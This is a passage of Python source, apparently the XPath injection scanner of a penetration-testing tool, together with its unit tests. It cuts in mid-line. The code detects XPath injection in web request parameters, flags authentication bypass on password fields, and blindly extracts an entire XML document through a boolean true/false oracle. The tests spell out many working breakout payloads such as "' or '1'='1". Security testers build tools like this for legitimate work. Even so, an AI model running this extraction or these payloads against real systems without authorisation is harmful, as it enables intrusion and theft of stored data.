'[', ']', '<', '>', '&', '/')) +_FREQ = (tuple(xrange(ord('a'), ord('z') + 1)) + + tuple(xrange(ord('A'), ord('Z') + 1)) + + tuple(xrange(ord('0'), ord('9') + 1)) + + tuple(ord(_) for _ in "@._-+ ")) +_CHARSET = [] +for _ in _FREQ: + if XPATH_CHAR_MIN <= _ <= XPATH_CHAR_MAX and _ not in _META_ORDS and _ not in _CHARSET: + _CHARSET.append(_) +for _ in xrange(XPATH_CHAR_MIN, XPATH_CHAR_MAX + 1): + if _ not in _META_ORDS and _ not in _CHARSET: + _CHARSET.append(_) + + +def _inferValue(oracle, builder, path, getter, maxLen=XPATH_MAX_LENGTH): + """Blindly infer a string value at `path` using `getter(builder, path, prefix)`. 
+ Returns the recovered value or None.""" + + value = "" + probes = 0 + + for _ in xrange(maxLen): + found = False + + for cp in _CHARSET: + candidate = value + chr(cp) + probes += 1 + + if oracle.extract(getter(builder, path, candidate)): + value = candidate + found = True + break + + if not found: + break + + if value.endswith(" "): + value = value.rstrip() + break + + logger.debug("XPath blind inference: %d probes (length=%d)" % (probes, len(value))) + return value if value else None + + +def _inferCount(oracle, builder, path, countFn, maxCount=128): + """Binary search for a count value using predicate 'count(...)>=N'.""" + + if not oracle.extract(countFn(builder, path, 1)): + return 0 + + lo, hi = 1, maxCount + while lo < hi: + mid = (lo + hi + 1) // 2 + if oracle.extract(countFn(builder, path, mid)): + lo = mid + else: + hi = mid - 1 + return lo + + +def _walkTree(oracle, builder, path="/*", depth=0): + """Recursively walk the XML tree from a given XPath expression. + Returns a dict: {name, path, children, attributes, text} or None.""" + + if depth > XPATH_MAX_DEPTH: + return None + + name = _inferValue(oracle, builder, path, + lambda b, p, prefix: b.nameStartsWith(p, prefix)) + if not name: + return None + + logger.info("discovered element: '%s'" % name) + + childCount = _inferCount(oracle, builder, path, + lambda b, p, c: b.childCount(p, c), + maxCount=32) + + attrCount = _inferCount(oracle, builder, path, + lambda b, p, c: b.attributeCount(p, c), + maxCount=16) + + attributes = [] + for i in xrange(1, attrCount + 1): + attrName = _inferValue(oracle, builder, path, + lambda b, p, prefix, idx=i: b.attributeNameStartsWith(p, idx, prefix)) + if not attrName: + continue + + attrValue = _inferValue(oracle, builder, path, + lambda b, p, prefix, idx=i: b.attributeValueStartsWith(p, idx, prefix)) + attributes.append({"name": attrName, "value": attrValue or ""}) + logger.info(" attribute: @%s='%s'" % (attrName, attrValue or "")) + + text = None + if childCount == 0: 
+ text = _inferValue(oracle, builder, path, + lambda b, p, prefix: b.textStartsWith(p, prefix)) + + children = [] + for i in xrange(1, childCount + 1): + childPath = "%s/*[%d]" % (path, i) + child = _walkTree(oracle, builder, childPath, depth + 1) + if child: + children.append(child) + + return { + "name": name, + "path": path, + "children": children, + "attributes": attributes, + "text": text, + } + + +def _treeToTable(node): + """Flatten a tree node to (columns, rows) for grid output.""" + + columns = ["Path", "Element", "Attribute", "Value"] + rows = [] + + def _flatten(n, depth=0): + path = n["path"] + rows.append([path, n["name"], "", ""]) + for attr in n.get("attributes", []): + rows.append([path, n["name"], "@" + attr["name"], attr["value"]]) + if n.get("text"): + rows.append([path, n["name"], "text()", n["text"]]) + for child in n.get("children", []): + _flatten(child, depth + 1) + + _flatten(node) + return columns, [_ for _ in rows if _[3] or _[2] not in ("", "text()")] + + +def _grid(columns, rows): + columns = [getUnicode(_) for _ in columns] + rows = [[getUnicode(_) for _ in row] for row in rows] + + widths = [] + for index, column in enumerate(columns): + width = len(column) + for row in rows: + if index < len(row): + width = max(width, len(getUnicode(row[index]))) + widths.append(width) + + separator = "+-" + "-+-".join("-" * _ for _ in widths) + "-+" + + def line(cells): + return "| " + " | ".join((getUnicode(cells[index]) if index < len(cells) else "").ljust(widths[index]) for index in xrange(len(columns))) + " |" + + return "\n".join([separator, line(columns), separator] + [line(row) for row in rows] + [separator]) + + +def _dumpTable(title, columns, rows): + if rows: + conf.dumper.singleString("%s:\n%s" % (title, _grid(columns, rows))) + + +def xpathScan(): + global SENTINEL + SENTINEL = randomStr(length=10, lowercase=True) + + infoMsg = "'--xpath' is self-contained: it detects XPath injection in HTTP " + infoMsg += "parameters and walks the 
def xpathScan():
    """Entry point of the '--xpath' switch.

    Tests every selected request parameter for XPath injection, reports what
    was found and, for the first injection point that has an extractable
    boundary, blindly walks the XML document tree and dumps it as a grid.

    Side effects: rebinds the module-level SENTINEL, writes through 'logger'
    and 'conf.dumper', and may call beep() when 'conf.beep' is set. Always
    returns None."""

    global SENTINEL
    # Fresh per-run value, later used as the non-matching base for OR-style boundaries
    SENTINEL = randomStr(length=10, lowercase=True)

    infoMsg = "'--xpath' is self-contained: it detects XPath injection in HTTP "
    infoMsg += "parameters and walks the reachable XML document tree. SQL enumeration "
    infoMsg += "switches (--banner, --dbs, --tables, --users, --sql-query) are ignored"
    logger.info(infoMsg)

    if not conf.paramDict:
        logger.error("no request parameters to test (use --data, GET params, or similar)")
        return

    # tested: parameters probed; found: parameters with a confirmed boolean oracle
    tested = found = 0
    # Injection points that can be used for extraction (Slot tuples)
    slots = []

    for place in (_ for _ in XPATH_PLACES if _ in conf.paramDict):
        for parameter in list(conf.paramDict[place].keys()):
            # Honor an explicit parameter selection when one was given
            if conf.testParameter and parameter not in conf.testParameter:
                continue

            tested += 1
            logger.info("testing XPath injection on %s parameter '%s'" % (place, parameter))

            # Phase 1: Probe the XPath parser for a backend hint
            backendHint, _errorPayload = _probeBackendByParserError(place, parameter)
            if backendHint:
                backendHint = _fingerprintByError(backendHint)

            # Phase 2: Establish a boolean oracle (authoritative)
            template, payload, boundary = _detectBoolean(place, parameter)
            if template:
                if boundary and boundary.extractable:
                    found += 1
                    backend = backendHint or "Generic XPath"
                    logger.info("%s parameter '%s' is vulnerable to XPath injection (back-end: '%s')" % (place, parameter, backend))
                    if conf.beep:
                        beep()

                    oracle = _makeOracle(place, parameter, template)
                    slots.append(Slot(place=place, parameter=parameter, backend=backend,
                                      oracle=oracle, template=template, payload=payload,
                                      boundary=boundary))
                    continue

                # Detection-only: boolean differentiation confirmed but no extraction boundary.
                # Report as auth bypass on credential fields; log generically otherwise.
                found += 1
                if _isPasswordParam(parameter):
                    title = "XPath auth bypass"
                    logger.info("%s parameter '%s' allows XPath auth bypass (boolean differentiation confirmed)" % (place, parameter))
                else:
                    title = "XPath boolean-based blind (detection-only)"
                    logger.info("%s parameter '%s' is vulnerable to XPath injection (detection-only, back-end: '%s')" % (place, parameter, backendHint or "Generic XPath"))
                if conf.beep:
                    beep()
                conf.dumper.singleString("---\nParameter: %s (%s)\n Type: XPath injection\n Title: %s\n Payload: %s=%s\n---" % (parameter, place, title, parameter, payload))
                continue

            # Reached only when no boolean oracle was established for this parameter
            if backendHint:
                logger.info("%s parameter '%s' reaches an XPath parser (back-end: '%s'), but no exploitable boolean oracle was established" % (place, parameter, backendHint))

    if not slots:
        # Nothing to extract from: summarize the outcome and stop
        if found:
            logger.info("XPath injection confirmed (detection-only, no extractable boundary established)")
            logger.info("XPath scan complete")
            return
        if tested:
            warnMsg = "no parameter appears to be injectable via XPath injection (%d tested)" % tested
        else:
            warnMsg = "no parameters found to test for XPath injection"
        logger.warning(warnMsg)
        return

    # Select the first oracle-bearing slot with an extractable boundary for tree-walking
    slot = next((_ for _ in slots if _.oracle and _.boundary and _.boundary.extractable), None)
    if not slot:
        logger.info("XPath scan complete")
        return

    original = _originalValue(slot.place, slot.parameter) or "x"
    # OR-style boundaries are always true if the original branch matches, so use a
    # sentinel that is guaranteed not to appear as a field value. AND-style
    # boundaries need the original branch to match; keep the original there.
    if " or " in slot.boundary.prefix:
        base = SENTINEL
    else:
        base = original
    builder = _XPathPayloadBuilder(base, slot.boundary)
    oracle = slot.oracle

    # Refine backend fingerprint if generic
    if not slot.backend or slot.backend == "Generic XPath":
        backend = _backendFromError(oracle.template)
        if backend:
            backend = _fingerprintByError(backend)
        if backend:
            logger.info("identified back-end: '%s'" % backend)
            slot = slot._replace(backend=backend)

    title = "XPath boolean-based blind"
    conf.dumper.singleString("---\nParameter: %s (%s)\n Type: XPath injection\n Title: %s\n Payload: %s=%s\n---" % (slot.parameter, slot.place, title, slot.parameter, slot.payload))

    # Blind XML tree-walking (attempted document-root traversal)
    logger.info("walking XML document tree (depth limit: %d)" % XPATH_MAX_DEPTH)
    root = _walkTree(oracle, builder)

    if root:
        columns, rows = _treeToTable(root)
        logger.info("extracted %d node(s) from XML tree" % (len(rows)))
        _dumpTable("XPath: %s parameter '%s' XML tree" % (slot.place, slot.parameter), columns, rows)
    else:
        # _walkTree() returned nothing, i.e. not even a root element name was recovered
        warnMsg = "XPath injection is confirmed but the XML tree could not be walked. "
        warnMsg += "This may indicate a restricted XPath context (subtree, scalar, or predicate-only)"
        logger.warning(warnMsg)

    logger.info("XPath scan complete")
class TestHelpers(unittest.TestCase):
    """Checks for the small helpers of the XPath engine that need no live target:
    similarity ratio, parameter delimiters, error and back-end recognition,
    credential-parameter detection, XPath quoting and payload assembly."""

    def test_ratio(self):
        same = xpath._ratio("abc", "abc")
        self.assertGreater(same, 0.9)
        different = xpath._ratio("abc", "xyz")
        self.assertLess(different, 0.5)

    def test_delim(self):
        from lib.core.enums import PLACE
        for place, delimiter in ((PLACE.GET, '&'), (PLACE.COOKIE, ';')):
            self.assertEqual(xpath._delim(place), delimiter)

    def test_is_error(self):
        errorPages = (
            "javax.xml.xpath.XPathExpressionException: error",
            "lxml.etree.XPathEvalError: Invalid expression",
        )
        for page in errorPages:
            self.assertTrue(xpath._isError(page))
        self.assertFalse(xpath._isError("normal page content"))

    def test_backend_from_error(self):
        errorPages = (
            "lxml.etree.XPathEvalError: Invalid expression",
            "System.Xml.XPath.XPathException: has an invalid token",
        )
        for page in errorPages:
            self.assertIsNotNone(xpath._backendFromError(page))
        self.assertIsNone(xpath._backendFromError("normal page"))

    def test_is_password_param(self):
        for name in ("password", "pass"):
            self.assertTrue(xpath._isPasswordParam(name))
        self.assertFalse(xpath._isPasswordParam("username"))

    def test_xpath_quote(self):
        # A value holding one kind of quote is wrapped in the other kind
        expectations = (
            ("hello", "'hello'"),
            ("it's", "\"it's\""),
            ('say "hi"', "'say \"hi\"'"),
        )
        for raw, quoted in expectations:
            self.assertEqual(xpath._xpathQuote(raw), quoted)

        # Both kinds of quote at once can only be expressed through concat()
        mixed = "it's \"great\""
        self.assertIn("concat", xpath._xpathQuote(mixed))

    def test_make_payload_with_suffix(self):
        boundary = xpath.Boundary("') or ", " or ('", True)
        built = xpath._makePayload("x", boundary, "starts-with(name(/*),'d')")
        self.assertEqual(built, "x') or starts-with(name(/*),'d') or ('")

    def test_make_payload_no_suffix(self):
        boundary = xpath.Boundary("' or ", "", True)
        built = xpath._makePayload("x", boundary, "1=1")
        self.assertEqual(built, "x' or 1=1")

    def test_make_payload_with_suffix_only(self):
        boundary = xpath.Boundary("' or ", " and '1'='1", True)
        built = xpath._makePayload("x", boundary, "1=1")
        self.assertEqual(built, "x' or 1=1 and '1'='1")
class TestBooleanDetection(unittest.TestCase):
    """Boolean oracle detection exercised against stubbed responses.

    Each test replaces 'xpath._send' with a local stub; setUp()/tearDown()
    save and restore the real sender around every test."""

    def setUp(self):
        self.original_send = xpath._send

    def tearDown(self):
        xpath._send = self.original_send

    def _detectWith(self, sender):
        """Install 'sender' as the transport and run detection on GET parameter 'q'."""

        xpath._send = sender
        return xpath._detectBoolean("GET", "q")

    def test_false_page_must_be_reproducible(self):
        # True is stable, false changes every time -> no oracle
        falseHits = []

        def unstable(place, parameter, value):
            if "true()" in value:
                return "true-page"
            if "false()" in value:
                falseHits.append(value)
                return "false-page-%d" % len(falseHits)
            return "default"

        template, _payload, _boundary = self._detectWith(unstable)
        self.assertIsNone(template)

    def test_detection_returns_extractable_boundary(self):
        pages = (
            ("true()", '{"count":7,"entries":[{...}]}'),
            ("false()", '{"count":0,"entries":[],"error":null}'),
        )

        def stable(place, parameter, value):
            # The first marker found in the injected value selects the page
            for marker, page in pages:
                if marker in value:
                    return page
            return "default"

        template, _payload, boundary = self._detectWith(stable)
        self.assertIsNotNone(template)
        self.assertIsNotNone(boundary)
        self.assertTrue(boundary.extractable)
class TestRealXPathSyntax(unittest.TestCase):
    """Verify that detection payloads and extraction predicates are syntactically
    valid XPath and produce the expected boolean results.

    Every check evaluates a real expression through _xpath_eval(), which raises
    unittest.SkipTest when lxml is not available; the tests here let that
    exception propagate so that they are skipped rather than failed."""

    @staticmethod
    def _count(template, payload):
        """Number of nodes matched once 'payload' is substituted into 'template'."""

        return _xpath_eval(template, payload)

    def _test_family(self, template_key, true_breakout, false_breakout, boundary_key, original="x"):
        """Check one injection context: the raw detection breakouts appended to
        'original' and the extraction boundary registered under 'boundary_key'
        must both give a match for 'true' and no match for 'false'."""

        template = _XPATH_TEMPLATES[template_key]
        boundary = xpath._BREAKOUT_BOUNDARY[boundary_key]
        self.assertIsNotNone(boundary)
        self.assertTrue(boundary.extractable)

        # Detection payloads must be syntactically valid and yield true/false
        truePayload = original + true_breakout
        falsePayload = original + false_breakout
        self.assertGreater(self._count(template, truePayload), 0,
                           "True payload '%s' should match at least one node" % truePayload)
        self.assertEqual(self._count(template, falsePayload), 0,
                         "False payload '%s' should match no nodes" % falsePayload)

        # The payload builder must accept this base/boundary pair (construction only)
        xpath._XPathPayloadBuilder(original, boundary)

        # Extraction predicate must be valid and change the result truthfully
        truePred = xpath._makePayload(original, boundary, "true()")
        falsePred = xpath._makePayload(original, boundary, "false()")
        self.assertGreater(self._count(template, truePred), 0,
                           "Extraction true predicate must match")
        self.assertEqual(self._count(template, falsePred), 0,
                         "Extraction false predicate must not match")

    def test_function_arg_family(self):
        self._test_family("function_arg",
                          "') or true() or ('", "') and false() and ('",
                          "') or true() or ('")

    def test_single_quoted_family(self):
        self._test_family("single_quoted",
                          "' or '1'='1", "' and '1'='2",
                          "' or '1'='1")

    def test_double_quoted_family(self):
        self._test_family("double_quoted",
                          '" or "1"="1', '" and "1"="2',
                          '" or "1"="1')

    def test_numeric_family(self):
        self._test_family("numeric",
                          " or 1=1", " and 1=2",
                          " or 1=1", original="1")

    def test_bare_predicate_family(self):
        self._test_family("bare_predicate",
                          " or true()", " and false()",
                          " or true()", original="1")

    def test_function_arg_second_variant(self):
        self._test_family("function_arg",
                          "') or '1'='1' or ('", "') and '1'='2' and ('",
                          "') or '1'='1' or ('")

    def test_single_quoted_with_matching_original(self):
        """When the original value matches a record (name='luther'), OR-style
        extraction with 'and' suffix is still decisive because the engine uses
        a non-matching sentinel base for tree-walking."""

        boundary = xpath._BREAKOUT_BOUNDARY["' or '1'='1"]
        # Simulate what xpathScan() does: use a sentinel as base for OR-style
        sentinel = "zzznotpresent"
        # The payload builder must accept the sentinel base (construction only)
        xpath._XPathPayloadBuilder(sentinel, boundary)
        truePred = xpath._makePayload(sentinel, boundary, "true()")
        falsePred = xpath._makePayload(sentinel, boundary, "false()")
        tpl = _XPATH_TEMPLATES["single_quoted"]
        self.assertGreater(self._count(tpl, truePred), 0,
                           "OR extraction must match with sentinel base + true predicate")
        self.assertEqual(self._count(tpl, falsePred), 0,
                         "OR extraction must not match with sentinel base + false predicate")

    def test_all_extractable_boundaries_have_valid_extraction(self):
        """Every extractable boundary must produce an expression that evaluates
        without error in a matching context (validity only, not truth value)."""

        # Match each boundary to an appropriate template and original value.
        _CONTEXT = {
            "') or true() or ('": ("function_arg", "x"),
            "') or '1'='1' or ('": ("function_arg", "x"),
            "') or 1=1 or ('": ("function_arg", "x"),
            '") or true() or ("': ("function_arg", "x"),
            "' or '1'='1": ("single_quoted", "x"),
            "' or true() or '": ("single_quoted", "x"),
            "' or 1=1 or '": ("single_quoted", "x"),
            "' and '1'='1": ("single_quoted", "x"),
            '" or "1"="1': ("double_quoted", "x"),
            '" or true() or "': ("double_quoted", "x"),
            " or 1=1": ("numeric", "999"),
            " or true()": ("bare_predicate", "999"),
        }
        for bk, boundary in xpath._BREAKOUT_BOUNDARY.items():
            if boundary is None or not boundary.extractable:
                continue
            tkey, original = _CONTEXT.get(bk, ("function_arg", "x"))
            template = _XPATH_TEMPLATES[tkey]
            payload = xpath._makePayload(original, boundary, "true()")
            try:
                count = self._count(template, payload)
            except unittest.SkipTest:
                # SkipTest derives from Exception; without this clause a missing
                # lxml would be reported below as an invalid boundary
                raise
            except Exception as e:
                self.fail("Boundary '%s' in '%s' with orig='%s' invalid: %s\n payload: %s" % (bk, tkey, original, e, payload))
            self.assertIsInstance(count, int,
                                  "Boundary '%s' in '%s' produced no count" % (bk, tkey))